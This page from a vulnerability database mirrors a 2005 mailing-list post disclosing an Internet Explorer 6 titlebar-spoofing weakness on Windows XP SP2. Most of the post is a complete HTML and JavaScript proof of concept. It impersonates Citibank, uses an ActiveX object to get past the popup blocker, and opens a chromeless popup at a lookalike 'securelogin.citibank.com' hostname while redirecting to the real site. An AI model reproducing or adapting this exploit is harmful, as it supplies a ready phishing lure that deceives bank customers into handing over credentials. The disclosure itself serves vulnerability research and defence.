Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ieBypass.txt

🗓️ 26 Feb 2005 00:00:00Reported by bitlance winterType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Windows XP SP2 has a vulnerability in Internet Explorer allowing malicious domain exploitation.

Code
`Hi LIST.  
  
Windows XP SP2 forces the titlebar to be present in script-initiated   
Internet Explorer windows.  
In the titlebar, domain name is listed before the page title.  
  
Using magic DNS,this domain name can be exploited by malicious people to   
trick users into visiting a malicious popup window.  
The weakness has been confirmed in version 6.0 on a fully patched system   
running Windows XP with SP2 installed.  
  
Example:  
- -----8<----- -----8<----- -----8<----- -----8<-----  
  
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
[!-- saved from url=(0014)about:internet -->  
[html lang="x-klingon">  
[head>  
[title>Welcome to Citibank[/title>  
[meta http-equiv="Content-Type" content="text/html; charset=UTF-8">  
[meta http-equiv="Content-Script-Type" content="text/javascript">  
  
[script type="text/javascript">  
[!-- Begin  
function shellscript()  
{  
window.focus();  
pURL = 'http://securelogin.citibank.com"+".e-gold.com/';  
sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';  
sP += 'menubar=0,resizable=0,width=315,';  
sP += 'height=200,left = 250,top = 200'  
day = new Date();  
id = day.getTime();  
eval("page" + id + " = window.open(pURL, '" + id + "',sP);");  
}  
  
function main()  
{  
targetURL = 'http://citibank.com/us/index.htm';  
x.DOM.Script.execScript(shellscript.toString());  
x.DOM.Script.setTimeout("shellscript()");  
location.replace(targetURL);  
}  
  
setTimeout(' main() ',1000);  
  
// End -->  
[/script>  
  
[/head>  
  
[object  
id="x"  
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"  
width="1"  
height="1"  
align="middle"  
>  
[param name="ActivateApplets" value="1">  
[param name="ActivateActiveXControls" value="1">  
[/object>  
  
[/body>  
[/html>  
  
- -----8<----- -----8<----- -----8<----- -----8<-----  
  
Reference:  
http-equiv (HOW TO BREAK XP SP2 POPUP BLOCKER)  
http://www.securityfocus.com/archive/1/384037  
  
  
REGARDS.  
  
--  
bitlance winter  
  
_________________________________________________________________  
On the road to retirement? Check out MSN Life Events for advice on how to   
get there! http://lifeevents.msn.com/category.aspx?cid=Retirement  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4
windows xpinternet explorer vulnerabilitymalicious popupmagic dns exploitationsecurity focus
22